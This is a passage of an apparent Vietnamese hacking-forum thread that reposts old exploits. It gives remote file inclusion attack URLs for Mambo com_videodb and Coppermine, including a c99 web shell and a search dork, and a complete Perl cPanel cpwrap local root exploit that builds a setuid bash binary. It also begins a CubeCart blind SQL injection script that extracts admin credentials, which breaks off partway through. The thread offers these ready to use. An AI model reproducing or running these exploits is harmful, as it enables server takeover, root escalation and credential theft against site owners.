om_videodb Mambo Componenet... Code: /modules/coppermine/themes/default/theme.php?THEME_DIR=c99 /modules/coppermine/include/init.inc.php?CPG_M_DIR=c99 Black_hat_crHCE cPanel Maildir.c\"
Trang 1om_videodb Mambo Componenet <= 0.3en Remote Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulneribility
download : http://mamboxchange.com/frs/download odb_v0.3en.zip
bug found in file : core/videodb.class.xml.php
global $mosConfig_absolute_path;
require_once( $mosConfig_absolute_path
'/includes/domit/xml_domit_lite_include.php' );
exploit:
http://[site]/[mambo]/components/com_videodb/core/videodb.class.xml.php?mosC onfig_absolute_path=[shell]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all
#batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
baby_hacker(HCE)
coppermine (nuke module) RFI vul
search google:
Code:
allinurl:modules.php?name=coppermine
xploit:
Trang 2Code:
<server>/modules/coppermine/themes/default/theme.php?THEME_DIR=c99
<server>/modules/coppermine/include/init.inc.php?CPG_M_DIR=c99
Black_hat_cr(HCE)
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
- Cái này hay à
Trích:
#!/usr/bin/perl -w
# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait
my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd = `pwd`;
chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";
if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }
open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"
/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
Trang 3print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);
system("$mysqlwrap DUMPMYSQL 2>/dev/null");
if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# milw0rm.com [2006-10-01]
navaro(HCE)
CubeCart <= 3.0.11 disclosure exploit
Tên bug: CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials
Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
-
CubeCart <= 3.0.11 "oid" blind SQL injection / admin credentials
disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "Copyright Devellion Limited 2005 All rights reserved."
-> this works against MySQL >=4.1 (allowing subs)
-
');
/* short explaination:
Trang 4software site: http://www.cubecart.com/site/home/
same kind of sql injection of http://retrogod.altervista.org/cubecart_3011_sql.html but this bypass magic_quotes_gpc=On because of base64_decode() function used
in
/modules/gateway/Protx/confirmed.php used near lines:
if($success == TRUE){
$cart_order_id = base64_decode($_GET['oid']);
include_once(" / / /includes/orderSuccess.inc.php");
$result = "?pg=".base64_encode("Protx");
} else {
*/
if ($argc<3) {
print_r('
-
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to CubeCart
Options:
-T[prefix]: specify a table prefix different from default (CubeCart_)
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-a adjust the first argument to pass to benchamrk() function
-s: use sleep() (this function was added in MySQL 5.0.12.) instead of
benchmark()
-d disclose table prefix (reccomended)
Example:
php '.$argv[0].' localhost /cubecart/
php '.$argv[0].' localhost /cubecart/ -a200000 -Tcube_
-
');
die;
}
error_reporting(0);
Trang 5ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" ";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy ';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {